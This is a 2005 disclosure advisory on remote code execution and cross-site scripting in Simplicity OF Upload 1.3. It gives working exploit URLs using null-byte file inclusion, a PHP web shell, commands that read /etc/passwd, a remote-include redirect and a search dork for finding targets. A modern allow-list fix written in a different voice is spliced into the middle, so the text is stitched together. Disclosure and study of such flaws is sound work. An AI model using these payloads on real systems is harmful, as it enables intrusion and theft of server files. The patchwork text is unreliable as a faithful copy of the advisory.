26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versions) remote code execution
& cross site scripting

software: Simplicity OF Upload 1.3
author site: http://www.phpsimplicity.com/scripts.php?id=3

remote commands execution:

problem at lines 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
   $language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...
=0D
you can include whatever file you want by adding a null byte to the "language" parameter value:

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see the upload & download pages together :)

so you can upload a cmd.gif file (when you upload a .php file, it is usually
renamed to .html...) with this php code inside to execute
commands:
=0D
<?php

system($HTTP_GET_VARS[command]);

?>
=0D
then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show the /etc/passwd file
=0D
cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
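Both issues above come from the same sink: require_once("$language.lng") builds a filesystem path from the request, so on the PHP releases of the day a NUL byte ended the path in the underlying C call and dropped the forced ".lng" suffix (PHP 5.3.4 and later reject paths containing NUL), and with remote URL includes enabled in php.ini the value can even name another server. As an added example, not code from the advisory or from Simplicity OF Upload, here is an allow-list based replacement for the snippet, written for current PHP; the languages/ directory and the "english" default are assumptions.

```php
<?php
// Hardened language selection for download.php. Added example for this
// note, not Simplicity OF Upload's own code. Assumes the translations live
// in ./languages/<name>.lng and that "english" is the shipped default.

const LANG_DIR     = __DIR__ . '/languages';
const LANG_DEFAULT = 'english';

/**
 * Turn the raw ?language= value into the name of an installed .lng file.
 * The candidate is chosen from an allow-list built by the server, so the
 * request can no longer steer the include: "upload.php%00", "../x" and
 * "http://evil/" all fail the pattern or the lookup and fall back to the
 * default. The original strtolower() is kept so "English" still works.
 */
function select_language(?string $requested, string $dir = LANG_DIR,
                         string $default = LANG_DEFAULT): string
{
    if ($requested === null) {
        return $default;
    }
    $requested = strtolower($requested);

    // A language name is a short lowercase word; \z (not $) also rejects a
    // trailing newline, and a NUL byte never matches [a-z_-].
    if (!preg_match('/\A[a-z][a-z_-]{0,31}\z/', $requested)) {
        return $default;
    }

    // Allow-list: basenames of the .lng files the administrator installed.
    $installed = [];
    foreach (glob($dir . '/*.lng') ?: [] as $path) {
        $installed[basename($path, '.lng')] = true;
    }
    return isset($installed[$requested]) ? $requested : $default;
}

// Resolve the chosen file and confirm it really sits under LANG_DIR before
// including it (defence in depth on top of the allow-list).
$language = select_language($_GET['language'] ?? null);
$langRoot = realpath(LANG_DIR);
$langFile = realpath(LANG_DIR . '/' . $language . '.lng');
if ($langRoot === false || $langFile === false
    || strpos($langFile, $langRoot . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(500);
    exit('language file not available');
}
require_once $langFile;
```

Because the include target is picked from files the server already has, the content of the language parameter never reaches the filesystem or a URL wrapper, which closes both the %00 truncation and the remote-URL variant at once.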

googledork:

"Powered By: Simplicity oF Upload"


rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html